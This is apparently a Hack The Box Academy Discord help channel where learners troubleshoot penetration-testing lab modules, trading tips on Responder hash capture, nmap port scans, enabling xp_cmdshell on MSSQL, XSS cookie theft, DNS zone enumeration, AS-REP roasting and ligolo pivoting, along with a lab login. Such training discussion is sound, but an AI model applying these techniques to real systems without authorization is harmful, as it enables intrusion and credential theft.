I'm telling you: Here's a resource to help you figure it out instead of endless google searches

Something i dont understand. Working on Skill assessment 2 for AD enum & attack. || I ran resonder and it is skipping previouslly discovered hash... okay what ever. But when i go cat out the hash file there are multiple hashes for the same user. Is this by design?||

it's likely grabbing the hash from another service

so it skips it from the same service

also delete the image as it's still a spoiler

:) (spoiler tags don't really do anything)

quick question , going blind in the entreprise network means done it without reading the question right ?

without reading the questions or the sections

the lab is used throughout the whole module

and the sections are practically walk-throughs for each bit

so just spawn it and go , until you got the whole domain ?

yup until you get DA or SA if it's a whole Forest

nice , tysm

also fwiw i think there's only like 1 thing that wasn't covered but the rest is all you've learned. At least that's what people have said

i've been respawning the machine 1000 times on medium lab and can't find the nonstandard port

only 5 ports are open

it's a double of the standard port fwiw though i think they changed it up

also don't forget to -p- :)

yes im doing the -p- now and see how it goes

its taking forever though

well if you're adding -sC and -sV to a -p- scan it will take a while

like several minutes

im doing it without the sC and sV

you might be able to get away with like -T3 or -T4

¯_(ツ)_/¯

hmm

does slow connection affect the scan duration too?

it can

thank you marcie

i did T4 and got it :3

in 1min

bruh i think they should switch the diffuclty of the two boxes

the easy box was so much harder than the medium one

¯_(ツ)_/¯

SESSION SECURITY

Skills Assessment

Anyone free for a DM?

pspssp <@&861185840277487616>

they spammed all acad channels

Hi, does the student subscription gives access to Senior Web Penetration path?

no

oh okay, thank you

the Senior path is tier 3 modules; the student sub only covers up-to and including tier-2

I see man, thank you for the info

Thanks @fathom pendant

you’ll have better luck getting unstuck if you just asked your question

I have placed the XSS for the cookie logger script in the julie profile and it doesn't get accessed by any admin or anything

why can't i enable xp_cmdshell

im in the hard lab of Attacking common services

did literally eveything , linked to another database where i have admin privilege but can't execute xp_cmdshell and when i try to enable throgh sp_configue i get error

your single quotes are messing you up

you need to break it up with double quotes

things that are seen in the quotes 'sp_configure ' ', 1'

iirc there was an open redirect vuln in the assessment

and the admin cookie could be accessed by xss due to lack of httponly protection

just figured it out before i read your help , i reread the whole attacking database section

thanks tho

np; sometimes asking the question helps you understand where you fucked up

bro thats sooooo trueeeeeee hahahaa

especially since your rephrasing the problem in your own words

it's a good strategy for learning things too ¯_(ツ)_/¯

read about x, knowing also about y
can I also do y with x?
don't see why not

yes thats true , when you start questioning things and take a few steps back you find the solution :3

yep especially if you can ask "Does this make sense"

https://academy.hackthebox.com/achievement/386037/116

i can now sleep its 3am in my country lul

stuck in "attacking dns" - attacking common services. I added my "<target ip> inlanefreight.htb" to /etc/hosts file. i can ping, nmap, they both give me feedback especially with seeing p53 is open. running nslookingup or dig against inlanefreight.htb gives me zero records

also tried subbrute on against inlanefreight.htb and it cant find anything

the question specifically ask me to run against inlanefreight.htb however if I use the examples used in the read up like inlanefreight.com.. those do fetch results. is this thing messed up or am i missing something?

You're missing something

Since .htb isn't an official tld you still need to specify a query server

Inlanefreight.com is a real website that's used in some engagements, which is why it works

I.e. with nslookup you'd specify the ip as the lookup

nslookup type=ns inlanefreight.htb $target_ip

nslookup and similar tools query using public nameservers

Subbrute is absolutely the right next step, you just have to provide it the right nameserver to query

If nslookup gives you a loopback, then it's safe to assume the nameserver it gives you is the same ip

Stuck on Attacking network Enterprise
I am having a strange problem the nmap binary is not working in ssh as in image
can anyone help...??

Looks like it's empty

no have given the ips in the live_hosts file

any other fixes?????

your nmap binary is empty

look at the size

omg

yeah got it...

how is this possible
when i transferred it showed 100%

LOL...

Something happened in the transfer and it didn't go through right

¯_(ツ)_/¯

aah....
Need to do the entire process again...

This is why doing some checksum verification is useful when doing file transfers

😓

figured out why i wasn't getting anything. removed the /etc/hosts entry i mentioned earlier. now when i run "dig inlanefreight.htb any @<target ip>" i get a name server.. the name server has a loopback. does that mean the name server's IP is the same as the <target ip>?

Correct. (You can also just put the ip in the resolvers.txt for subbrute

nice, making progress now. thanks

btw discord has a search feature where you can search and see if people have asked a similar question to yours

;) I can guarantee you're not the first person to ask

What defines the functions our objects have?

Does anyone want to help me, to tell what the answer is, I've spent 2 hours and only get errors. Help me

It helps if you specify what module you're working on and what errors you might be getting

hello

I worked on the module Information Security Foundation >> Introduction to Windows Command Line >> first question

So the section: command prompt basics

?

You could say that

I'm asking you

You're the one actually looking at the module and section you're working on lol

I can't help narrow down where you're fucking up if you don't help me know where you're at

"First question" doesn't necessarily help

If it is that section its Just the folder name, not the filepath

I'm not sure how to explain it, but maybe I'll try again

Thank you in advance

Hi guy’s i need help for the Using Web Proxies Module’s, someone can help me pls

http://dontasktoask.com

Can anyone gift me 550 - 600 academy cubes to complete my desired module? I am very eager to learn from HTB Academy. It will be very helpful for me. Or is there any way to earn this amount of cubes except by referring? Because I've already referred enough of my known persons.

You can just buy them

Or if you're a uni student with a uni email, the student discount is pretty good

you gotta look more into how the referral works, you only get a tiny portion if someone signs up for a subscription ¯_(ツ)_/¯

You're not gonna have a sustainable amount off referrals

for now, I don't have the opportunity to buy. I am a jobless person and I don't have any payment option from Bangladesh(my country), international card or anything like that.

Then you're just gonna have to be patient brother, htb occasionally does giveaways if you check in on their socials

You can compete in the upcoming ctf where you have a chance to subscriptions on Academy as well - https://www.hackthebox.com/events/cyber-apocalypse-2024

is it for advance or just beginner stuff ?

Thanks for the info. I will be patient. But nowadays, I don't see any giveaway. The last giveaway I saw was on the HTB birthday anniversary. I was trying hard to decode the Python code they gave, but I failed that day. But I was a little far from getting the giveaway. That was the sad moment.

I believe it caters for all levels from beginner to advanced

Can anyone confirm if kerbrute has stopped automatically asreproasting pre auth disabled users?

cause im lost rn

the hashes from kerbrute can't be cracked, has been broken for a while

I need help for the Burp Intruder Section and Repeating Requests section

Im sorry could you explain more
I recall running the tool in the academy labs a couple months back and got hashes but rn doing a box and it didnt, making me completely ignore a potential foothold vector 💀

is it problem from the tool or what ?

as in don't use kerbrute for anything other than bruting, for kerberoast and asreproast use something else

from my testing yeah

they can be cracked if you use nxc or impacket

the last time , I tried doing it was fine

maybe some updates

not sure but im not the only one that ran into that

I am just a noob. I don't have enough knowledge to be in the top 10.

Can confirm

Everything from very easy - advanced

neitheir do I

don't forget that the best challenge writeup can win a playstation 5

It comes with a 12 year shipping delay

if you tell me where you have problems maybe i could help

no that's the worst prize , if I get ps5 no more studying lol

same

I followed each steps but this not working i dont find the answer

Thanks, the question has been adjusted
Please do not post any spoilers (answers)

what steps are you talking about

When i do the commande injection i don't find the path on the section "Repeating Requests"

Module: Windows Fundamentals (Windows Services & Processes)

How do I resolve this issue? I've already tried resetting the pwnbox and target machine.

┌─[eu-academy-1]─[10.10.14.184]─[htb-ac-773541@htb-za5ahfa6ou]─[~]
└──╼ [★]$ xfreerdp /v:10.129.120.207 /u:htb-student /p:Academy_WinFun!
[10:57:36:758] [2499:2500] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[10:57:36:758] [2499:2500] [ERROR][com.freerdp.core] - failed to connect to 10.129.120.207

Hello guys i need help

Module: Shell and Payloads
Section: Anotomy of a shell
Question : " + 0 Which two shell languages did we experiment with in this section? (Format: shellname&shellname) "

I extracted the information with the env command, but I could not find the correct format.

thx for help

try with single quote /p:'password'

Wrap password in single quotes

It worked. I swear I tried it earlier and it didn't work 😂
Thanks

hahahahahah that's happens all the time

Same module, I'm having trouble with the question

Identify one of the non-standard update services running on the host. Submit the full name of the service executable (not the DisplayName) as your answer.
Do I find this in Task Manager?

maybe , i don't remember

the question asked for within the section itself

any1 facing problem with slow labs ?

yeap but i dont find true format

dm ur answer

works fine for me

maybe I need to switch vpn

why is the vm of priv esc (sudo) so slow

yes me

The bash script modules in the Information Security path are driving me crazy. I feel like the material isn't preparing me to write the scripts to answer the questions.

Little help from Attacking Network Enterprise
Anyone ligolo expert here

trying to run commands as per github repo but this strange error !!!!

Can anyone help???

you use the wrong subnet

+the problem is not from ligolo , you can't have x.x.8.0/16 just not possible

just use the subnet from the module

I put .0 because i want to acces all others from those 172.16.8.X/16

from i one the tutorial of John HAMMOD

the problem is /16

it's depends on the subnet

use /23

ok

if you have an idea abt subnetting you will know why this is not possible

aah got it

i used 24 and it worked

Thanks @limber river

sometimes yt tutorials show things such a way that every is just magic

why is HTB vpn not connecting even when im not connecting to the server in maintainance, is this only happening to me or it seems all the servers are down??

most of ytb channel , they just pretend to hack in front of you , they don't teach how stuff works

hey @limber river just want to ask one thing

My head is not working but need to complete this thing

Now as I can do scan etc etc 172.16.8.50 say

How to visit this 172.16.8.50 in firefox?

It gives connection failed

you can ping it ?

oohhh ohh worked..!!

congrats , still having issue with PE on the initial access , idk why it's not working lol

sometimes i make some unexpected mistakes